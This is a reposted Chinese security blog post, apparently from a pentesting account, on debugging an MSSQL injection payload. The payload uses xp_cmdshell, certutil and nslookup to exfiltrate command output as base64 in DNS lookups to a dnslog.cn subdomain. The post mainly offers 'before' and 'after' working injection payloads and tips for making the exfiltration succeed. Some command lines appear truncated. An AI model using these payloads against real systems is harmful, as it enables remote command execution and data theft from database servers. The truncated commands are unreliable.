mssql 为什么连接是sleeping 而不释放_MSSQL注入DNS带外问题解决

最新推荐文章于 2022-05-29 22:29:16 发布
最新推荐文章于 2022-05-29 22:29:16 发布
阅读量154 收藏
点赞数
文章标签: mssql 为什么连接是sleeping 而不释放
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39638859/article/details/111705171
版权
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

所有话题标签:

#Web安全   #漏洞复现   #工具使用   #权限提升

#权限维持   #防护绕过   #内网安全   #实战案例

#其他笔记   #资源分享

0x01 前言

朋友@Sin在“对某系统实战练手”这篇文章中看到这种MSSQL注入DNS带外数据的利用方式,但是他在本地复现时遇到了一些问题,所以找我帮着给测试一下,正好闲着没事就看了一下,并在解决这个问题后给他写了这篇记录文。

0x02 正文部分

我们先来看下原作者给出的DNS带外数据命令行版,可以直接执行并通过dnslog接收命令回显。继续来分析一下这条命令的参数和实现的功能吧,cmd参数说明如下。
  • /c:执行字符串指定的命令然后终止,

  • /v:使用 ! 作为分隔符启用延迟的环境变量。

cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=

170967c15cc2c47233bca2cc2b03db88.png

1、执行whoami命令写入到temp文件中,并使用certutil命令进行base64编码到temp2文件。

whoami > temp && certutil -encode temp temp2
5f5b395e693bc12e4d5a22fdd18585d9.png 2、使用findstr命令在temp2文件中搜索不包含"CERTIFICATE"的行内容写入到temp3文件,/L参数:按字使用搜索字符串,/V参数:只打印不包含匹配的行。 
findstr /L /V "CERTIFICATE" temp2 > temp3
23feeb10c2d1ace3735d9dd0bbd1e77d.png 3、MYVAR变量等于temp3文件内容,FINAL变量=MYVAR.DNSLOG,最后用nslookup命令执行FINAL:nslookup cGVudGVzdC13aW4xMFxzaGFkb3c5DQo=.xhwls9.dnslog.cn,没有nslookup命令时可用ping命令替代,执行这条命令时必须加上cmd的/v参数。 
set /p MYVAR=set FINAL=!MYVAR!.xhwls9.dnslog.cn && nslookup !FINAL!"
c1b51f489e33bab87d9705af498d0680.png

使用原作者给出的MSSQL注入DNS带外数据Payoad时出现了下图中的报错,笔者根据这个报错进行了一系列的测试,最终修改出以下可执行Payload,可以自己去对比一下它们之间的差别在哪。

修改之前:

exec master..xp_cmdshell "whoami>C:\ProgramData\temp%26%26certutil -encode C:\ProgramData\temp C:\ProgramData\temp2%26%26findstr /L /V ""CERTIFICATE"" C:\ProgramData\temp2>C:\ProgramData\temp3";exec master..xp_cmdshell "cmd /v /c""set /p MYVAR="";exec master..xp_cmdshell "del ""C:\ProgramData\temp"" ""C:\ProgramData\temp2"" ""C:\ProgramData\temp3""";
9a355eab9dd742f03a856c8849e2fa6c.png

修改之后:

exec master..xp_cmdshell 'whoami>C:\ProgramData\temp %26%26 certutil -encode C:\ProgramData\temp C:\ProgramData\temp1 %26%26 findstr /L /V "CERTIFICATE" C:\ProgramData\temp1>C:\ProgramData\temp2';exec master..xp_cmdshell "cmd /v /c""set /p MYVAR="";exec master..xp_cmdshell 'del "C:\ProgramData\temp*"';
34a1a26aab3b8b78879324c917fd6f52.png

0x03 注意事项

  1. CMD命令行下执行时直接用&&连接即可,而在URL提交时必须将&&用Urlencode进行编码;

  2. 出现“开头的 标识符 太长。最大长度为 128”报错时可尝试将最外边的双引号改为单引号;

  3. 第一条语句用findstr搜索"CERTIFICATE"字符串时必须用双引号,否则可能找不到指定字符;

  4. 第一条语句注意查看temp2内容是否正确,如果不正确或为内容为空时将无法带出相关数据;

  5. 第二条语句必须加上cmd的/v参数,否则可能即使不出现报错也无法带出相关数据;

  6. 第二条语句最外边的引号必须用双引号,单引号即使不出现报错也无法带出相关数据。

【往期TOP5】

基于协议判断主机是否出网

星外虚拟主机提权实战案例

Metasploit获取不到会话原因

TP-RCE绕过阿里云防护Getshell

看图识WAF-搜集常见WAF拦截页面

【推荐书籍】

b121e23e8a7ac5ae29228b25cb93db8f.png b70b502d979801bd77dc17685fff8fa6.gif  如果对你有所帮助,点个分享、赞、在看呗!b70b502d979801bd77dc17685fff8fa6.gif
weixin_39638859
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql带外_【技术分享】MySQL带外攻击(含演示视频)
weixin_35252187的博客
02-02 260
Brexit预估稿费:180RMB投稿方式:发送邮件至 linwei#360.cn ,或登陆网页版在线投稿概述关于MSSQL和所有的这一切都只在Windows环境下的MySQL中有可能实现。什么是带外注入?这些攻击涉及通过除服务器以外的其它方式提取MySQL的限制条件MySQL中存在一个全局系统变量secure_file_priv。这个变量用来限制数据导入和导出操作的影响,例如由LOAD DA...
Sqlserver查询释放连接(预防死锁、卡顿)
最新发布
12-29
Sqlserver 中,空连接是指状态为“sleeping”的连接,表示当前连接没有活动的 SQL 语句在执行,但仍然占用系统资源。这些空连接可能会导致死锁和卡顿的发生,因为它们占用系统资源,阻止其他连接的执行。 释放空...
mssql 为什么连接sleeping 而不释放_PHP连接msSQL数据库方法
weixin_39777543的博客
12-17 200
1.什么是msSQL呢?msSQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。SQL Server一开始并不是微软自己研发的产品,而是当时为了要和IBM竞争时,与Sybase合作所产生的,其最早的发展者是Sybase,同时微软也和Sybase合作过 SQL Serv...
sap甲方_当了解ERP尤其是SAP顾问的薪酬后,你就知道为什么SAP为何强大了
weixin_39769039的博客
12-14 1166
导读:物联老鬼从事智能制造行业也算是有8年的光景了,某一次得知公司的SAP顾问工资居然达到了5万的月薪,老鬼自己都开始觉得不可思议。随着后来逐渐接触到智能制造中从事汽车工业、制药行业、医疗器械行业、白酒行业、金融行业等人士使用到的ERP系统,像SAP、用友、QAD、Tiptop、金蝶系统后,老鬼不得不发出感叹:市场选择了SAP,SAP成就了从业顾问作者:物联老鬼原创版权声明:本文为今日头条自媒体-...
mssql 为什么连接sleeping 而不释放_windows NLB实现MSSQL读写分离--从数据库集群读负载均衡...
weixin_39935571的博客
12-13 149
主从模式,几乎大部分出名的数据库都支持的一种集群模式。当Web站点的访问量上去之后,很多站点,选择读写分离,减轻主数据库的的压力。当然,一主多从也可以作用多个功能,比如备份。这里主要演示如何实现从数据库集群的读负载均衡搭建一主三从的MSSQL集群192.168.99.250 //主服务器 192.168.99.8 //从服务器(WIN-6S3JNU8C4TB) 192.168.99.10 ...
mysql——DNS注入
qq_45300786的博客
08-09 1703
DNS log 【DNS日志注入】 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 DNS注入的核心,将盲注转化为显错注入 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 比如 ox.qidao.com => DNS记录了这个请求, 那么我们也可以让mysql也能发出请求,DNS也会记录 ...
Sleeping_Dogs_SAVE_Games2you.rar_Just Cause_sds
09-24
在你提供的压缩包“Sleeping_Dogs_SAVE_Games2you.rar_Just_Cause_sds”中,包含了一个解锁所有内容且未被摧毁的游戏存档,这对于喜欢探索和享受游戏全部内容的玩家来说非常有价值。 存档名"Hardcore-mode"表明这是...
WSN.zip_CoCMA_Energy-Coverage_energy efficient_sink wsn_sleeping
07-15
It also used the wake-up scheme to awaken some sensor nodes in a sleeping mode through an optimization strategy to preserve the sensing coverage of the CWSN. The experimental results show that the ...
Sleeping-Barber:使用pthreads库解决Sleeping Barber同步问题的C代码
06-04
《使用pthreads库解决Sleeping Barber同步问题的C代码解析》 在计算机科学中,Sleeping Barber问题是一个经典的多线程同步问题,它源于现实生活中的理发店场景:一个理发师在没有顾客时会打盹儿,当有顾客到来时,...
linux用多线程同步方法解决睡眠理发师问题(Sleeping-Barber_Problem).pdf
12-10
linux用多线程同步方法解决睡眠理发师问题(Sleeping-Barber_Problem).pdf
Mssql注入——dns注入,反弹注入
weixin_46601374的博客
02-28 2727
DNS注入 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 load_file函数的作用 用于读取文件内容,并返回输出 load_file函数是什么 load_file 读取文件函数,读取的内容返回为字符串输出。 load_file函数在注入的作用 利用读取注入的报错信息,然后返回报错信息(显
mysql dns注入_SQL 注入-DNS 外带数据
weixin_35123047的博客
02-07 285
参考文章注:外带数据皆为数据库版本信息mysql条件:Windowsmysql.ini 中 secure_file_priv 必须为空,select @@secure_file_priv适用于联合注入或堆叠注入具体:利用 mysql (Windows 适用)中的 load_file() 函数select load_file(concat("\\\\",version(),".1ndex.dnslo...
SQL Server2000中如何删除指定的sleeping状态的程序连接
cuixie2370的博客
07-16 251
Windows 2000 SQL Server 2000 SP4 CREATE PROCEDURE dbo.KillProcesses @dbName varchar(50) AS BEGIN...
sql注入dns带外通信实践】
qq_40646572的博客
05-29 904
带外通信技术,通常使用在无法直接利用漏洞获得回显的,但目标确实存在漏洞的情况下使用,通过DNS请求就可以把想获得的数据外带出来。 带外通信使用在sql注入的条件如下: 部分文章介绍带外通信时,提及需要设置 secure_auth=ON并且secure_file_priv=’‘。但我在环境实现时发现,只需要设置下secure_file_priv=’‘即可,当然可能时因为版本的问题。我使用的mysql版本如下: 使用的dnslog是用的ceye平台的,自己个人资料中的标识符中的地址就是dns回显地址。 h
sqlserver 删除造成锁表的sleeping进程脚本
羽之大公公的博客
03-06 1027
alter PROCEDURE dbo.Kill__Sleeping_Processes AS BEGIN SET NOCOUNT ON declare @v_sid int declare @sql varchar(50) declare cur_kill_sleep cursor for WITH sess AS ( SELECT blocking_session_i...
android 的app进程的 top-sleeping 是什么东西?
03-11
top-sleeping 是指在 Android 系统中,当一个应用程序处于后台运行时,系统会将其进程置于休眠状态,但仍然保持在系统的进程列表中,并且可以通过 top 命令查看其状态。这个状态被称为 top-sleeping
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值